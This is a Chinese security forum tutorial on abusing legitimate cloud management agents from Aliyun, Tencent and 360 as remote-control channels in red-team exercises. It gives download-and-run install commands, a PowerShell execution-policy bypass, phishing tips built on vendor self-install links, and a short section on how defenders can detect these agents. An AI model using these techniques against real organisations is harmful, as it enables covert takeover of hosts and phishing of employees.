安全矩阵

 找回密码
 立即注册
搜索
查看: 903|回复: 0

云上天然cs远控

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-9-4 23:31:42 | 显示全部楼层 |阅读模式
本帖最后由 alyssa 于 2023-9-4 23:32 编辑

hvv期间曾曝出过红队利用360企业安全云平台进行钓鱼、利用阿里云平台进行投毒等事件,出于好奇,学习了下这方面相关的知识,分享一下。

上述两个事件就不再赘述,关注过hvv的应该都知道的。笔者从三个云平台进行学习,分别为:阿里云安全中心平台、腾讯云助手、360企业安全云平台。


1阿里云-云安全中心CS云安全中心介绍概述云安全中心是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统,通过防勒索、漏洞扫描修复、防病毒、防篡改、合规检查等安全能力,帮助用户实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上主机、本地服务器和容器安全,并满足监管合规要求。

aliyun安全中心提供终端控制平台和agent,用于监听和控制资产内的主机

agent安装后,会实时向云安全中心服务端上报客户端信息,包括:终端是否在线、终端采集所需数据等

agent运行条件,Linux使用root账号运行、Windows使用system账号权限运行。(这个条件在攻防当中利用妥当,直接不用提权)

安装agent插件后,服务器会自动下载aegis_client和aegis_update文件,并启动进程AliYunDun和AliYunDunUpdate。其它文件和进程只有在开启相应功能后才会下载和启动。


aegis_client功能:该目录下核心进程Aliyundun,用于与云安全中心服务器建立连接;该目录下核心进程AliYunDunMonitor,用于主机安全监控与检测。

文件下载时间:安装Agent插件后,aegis_client文件会下载到服务器中。

文件所在路径:

Windows 32位系统:C:\Program Files\Alibaba\aegis

Windows 64位系统:C:\Program Files (x86)\Alibaba\aegis

Linux系统:/usr/local/aegis


aegis_update功能:该目录下核心进程为AliYunDunUpdate,用于定期检测云安全中心Agent是否需要升级。

文件下载时间:安装Agent插件后,aegis_update文件会下载到服务器中。

文件所在路径:

Windows 32位系统:C:\Program Files\Alibaba\aegis

Windows 64位系统:C:\Program Files (x86)\Alibaba\aegis

Linux系统:/usr/local/aegis

以上两个文件安装Agent时会自动下载,同时还有很多可选文件,需要打开相应功能才能下载,具体见:https://help.aliyun.com/zh/secur ... .0.0.45e94e842lq0r9

兼容性

Window(32/64):

  • Windows Server 2022
  • Windows Server 2019
  • Windows Server 2016
  • Windows Server 2012
  • Windows Server 2008

Linux (64):

  • Alibaba Cloud Linux
  • AlmaLinux
  • Anolis OS
  • CentOS 6、7、8
  • CentOS Stream
  • Debian 8及以上版本
  • Gentoo
  • OpenSUSE
  • Red Hat 6及以上版本
  • RHEL 6、7、8
  • Rocky Linux
  • SUSE
  • Ubuntu 14.04及以上版本

同时该Agent还支持众多不同内核版本的系统,详见:https://help.aliyun.com/zh/secur ... .0.0.45e94e842lq0r9

从兼容性上看,直接降低了agent安装利用的难度。


Agent安装

一键自动安装Agent

前提条件:

  • 服务器为阿里云服务器
  • 服务器在运行,且网络无故障
  • 服务器使用专有网络
  • 服务器不能使用其他第三方安全软件
  • 服务器所在地域支持一键安装功能
  • 服务器已安装云助手

操作步骤:

  • 登录云安全中心控制台。在控制台左上角,选择需防护资产所在的区域:中国或全球(不含中国)。
  • 在左侧导航栏,选择系统配置 > 功能设置。
  • 在客户端 > 未安装客户端页签,在要安装Agent的服务器的操作列单击安装客户端,为该服务器安装Agent。

您也可以选中多台服务器后单击一键安装,批量安装Agent。

Agent插件安装完成约5分钟后,可在资产中心 > 主机资产 > 服务器页签,查看服务器的客户端在线情况。

这种方式只仅限于目标服务器是阿里云服务器,日常攻防工作当中,非云服务器目标资产还是占大多数的。这种方式不再赘述。


手动安装Agent

该方式为非云服务器上云统一管控提供了解决方案,可以将非云或其他云服务器托管到云安全中心进行统一管理。

  • 登录云安全中心,区域选择全国
  • 系统配置-功能设置-客户端-安装命令

3. 使用管理员权限的账号登录需要安装Agent的服务器,根据操作系统复制安装命令并执行window命令:

powershell -executionpolicy bypass -c "(New-Object Net.WebClient).DownloadFile('http://aegis.alicdn.com/download/install/2.0/windows/AliAqsInstall.exe', $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath('.\AliAqsInstall.exe'))"; "./AliAqsInstall.exe -k=ogkP11"

linux命令:

wget "https://aegis.alicdn.com/download/install/2.0/linux/AliAqsInstall.sh" && chmod +x AliAqsInstall.sh && ./AliAqsInstall.sh -k=wbk0j6

测试环境ubuntu20.04,执行安装命令后,出现如下信息为安装成功

安装成功后,在云安全中心-主机资产处会显示客户端

注意:安装后,服务器会启动三个进程:AliYunDunUpdate、AliYunDun和AliYunDunMonitor。其中AliYunDunMonitor进程会在其他两个进程启动后的大概10分钟左右启动。没启动前,云安全中心显示离线状态。

此时客户端主机已经上线,不过还无法进行远控,还需要安装云助手(如果服务器是云服务器,可以一键安装,安装后可进行远控)。通过云助手远控客户端。下面了解下云助手的作用和部署方式。

云助手

云助手是专为云服务器ECS打造的原生自动化运维工具,免密码、免登录、无需使用跳板机,即可批量执行命令(Shell、PowerShell、Bat等),实现自动化运维脚本、轮询进程、安装卸载软件、启动或停止服务、安装补丁或安装安全更新等任务。

阿里云设计云助手主要用来操作阿里云服务器使用,但同时,也对非阿里云服务器提供了混合云方案,即使我们的目标不是阿里云服务器,也可以让它上线到云安全中心进行远控。

版本要求:

- Alibaba Cloud Linux 2/3及更高版本
- CentOS 6/7/8及更高版本
- CoreOS
- Debian 8/9/10及更高版本
- OpenSUSE
- RedHat 5/6/7及更高版本
- SUSE Linux Enterprise Server 11/12/15及更高版本
- Ubuntu 12/14/16/18及更高版本
- Window Server 2012/2016/2019及更高版本
安装云助手Agent

步骤一:创建托管实例注册码

云服务器ECS-运维与监控-发送命令/文件(云助手),选择托管实例

如果这里还没有实例,会显示一个创建注册码的提示,因为我已经创建了,所以会显示已经添加的实例,如果需要继续添加,可以点击“注册新实例”。

点击生成注册码后,会出现注册命令,如下图

步骤二:下载并安装agent

根据目标系统,选择可用的命令,并执行

安装完成后,系统会启动一个相关服务

步骤三:验证安装结果

回到托管实例页面,刷新

点击执行命令

点击远程控制

2360企业安全云产品介绍360企业安全云作为新一代数字安全与管理SaaS服务,基于360安全大脑安全能力,依托全面SaaS架构,实现硬件、软件、数据、资产、上网、防勒索等全方位数字安全与管理服务。从管人员、管资产、管数据三大价值层面助力企业数字化管理提效,对人员身份及行为管理、软、硬资产兼管、数据全链路守护等实现了一体化综合统效,全面赋能企业数字化转型。

详情见:https://b.360.net/product-center/Endpoint-Security/safe-team

安装部署

步骤一:选择部署方式

1. 选择部署方式,创建部署连接

这里提供三种安装方式:
  • 手动下载安装:该方式需管理员自己下载好客户端安装包,并在需要安装客户端的主机上运行。
  • 员工自主下载:该方式需要客户端用户自行下载客户端,并安装,需管理员提供下载链接,通过沟通软件或者邮件发送给所需用户。
  • 域控分发:管理员通过AD域环境将安装包分发到终端并执行。在指引中提供了分发方案。

在攻防场景中,如果去钓鱼的话,建议使用方式一和方式二(而且该平台还贴心提供了邮件信息模版),如果在内网已经有了一定的权限,可使用方式一和方式三进行远控。

步骤二:安装客户端

方式一,管理员先行下载安装包根据客户端版本下载相应的安装包
方式二:需要员工自己访问下载地址进行安装

该链接是企业专属的下载链接。即按照我创建的链接下载客户端,安装后会加入到我的企业管理后台,被我远控。(hvv钓鱼那个事就是这个方式)

步骤三:进行远控

安装完成后,在远程运维-远程控制,可进行远控,如下图

局限性

进行远控分为多个方式,如下图

对于攻防场景来说,远控和执行命令是最为需要的,但是目前360企业安全云,只有PC远程控制可以免费,而且需要被控端同意,才可以远程控制,如下图

这直接增加了被发现的风险。

在该问题上,360企业安全云同样有解决方案:无人值守远程控制,这个不需要确认直接可以远程控制。但是却需要花费一定的大米,看一下花费多少大米

另外一种方式:远程CMD,花费大米如下

因为笔者吃不起苕皮,不舍得花费这80米,所以就没办法复现远控的镜头啦(狗头)。对笔者来说确实是局限性。

3腾讯云助手CS产品简介概述自动化助手(TencentCloud Automation Tools,TAT)是云服务器 CVM 和轻量应用服务器 Lighthouse 的原生运维部署工具。自动化助手提供了一种自动化的远程操作方式,无需登录及密码,即可批量执行命令(Shell、PowerShell 及 Python 等),完成运行自动化运维脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等任务。

自动化助手虽然是腾讯云服务运维部署工具,但是也提供了非腾讯云的方案,将非腾讯云机器通过自动化助手注册为腾讯云托管实例。

兼容性

服务器操作系统版本需为:

  • TencentOS Server 2/3及更高版本。
  • OpenCloudOS Server 8/9及更高版本。
  • CentOS 6/7/8、CentOS Stream 8/9及更高版本。
  • Ubuntu 14/16/18/20/22及更高版本。
  • Debian 8/9/10/11及更高版本。
  • RedHat 7/8/9及更高版本。
  • 其他 Linux 操作系统版本:CoreOS、Fedora、OpenSUSE、Fedora、FreeBSD、Rocky Linux 等。
  • Windows Server 2008/2012/2016/2019/2022 及更高版本。
  • 待注册的服务器支持公网访问(直连方式与代理方式均可)。

基本覆盖了常用的服务器版本。

部署

步骤一:生成注册码

  • 云服务器-自动化助手-托管实例
2. 填写相关信息,并生成注册码
参数说明:[td]

参数名称参数描述
注册码名称新注册的实例,将使用对应注册码的名称作为前缀生成有序的实例名。
有效网段指定注册码限制客户端只能从有效网段出口进行注册。默认不做限制。
可注册实例数指定注册码允许注册的实例数,可设置范围1~999台,默认限制为10台。
有效时间指定注册码的有效时间,可设置范围1~11小时,默认为4小时。
注册码描述描述当前注册码的用途等信息,方便后续管理。
  • 创建完成后,会生成安装Agent的命令





步骤二:托管实例
  • 使用步骤一中生成的命令,根据目标主机系统版本,选择合适的安装命令并执行


Agent自动生成服务tat_agent.service,并开始执行。

2. 回到腾讯云,查看托管实例列表

3. 执行命令

4免杀效果

通过上述操作不难发现,我们如果想要让目标服务器上线,避免不了安装agent等客户端,那么在安装客户端的时候,会被现有的安全防病毒查杀吗?

云安全中心Agent

云助手agent

360 agent

5防守方视角

作为防守方,如果我们的服务器被上述方式控制,我们应该要做哪些工作?如何去防守呢?

首先,可以从进程和服务进行排查。

阿里云安全中心,安装了Agent时,服务器会启动三个进程和一个服务,分别是:AliYunDun、AliYunDunUpdate、AliYunDunMonitor和服务aliyun-service


腾讯云助手,安装自动化助手agent时,系统自动创建tat_agent.service服务,使用systemctl list-units --type=service --state=running 列出所有正在运行的服务

systemctl status tat_agent.service 查看服务状态



同时也可查看进程


其次,阿里云安全中心agent可以从系统添加的用户排查。当安装了云助手时,系统默认添加用户ecs-assist-user,通过查看/etc/passwd进行排查

6待解决问题
  • 以上环境均为非云环境下的服务器,那么如果我们的服务器是对应的云服务器,应当如何排查?

  • 如何对上述利用方法进行有效溯源?




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 11:39 , Processed in 0.013818 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表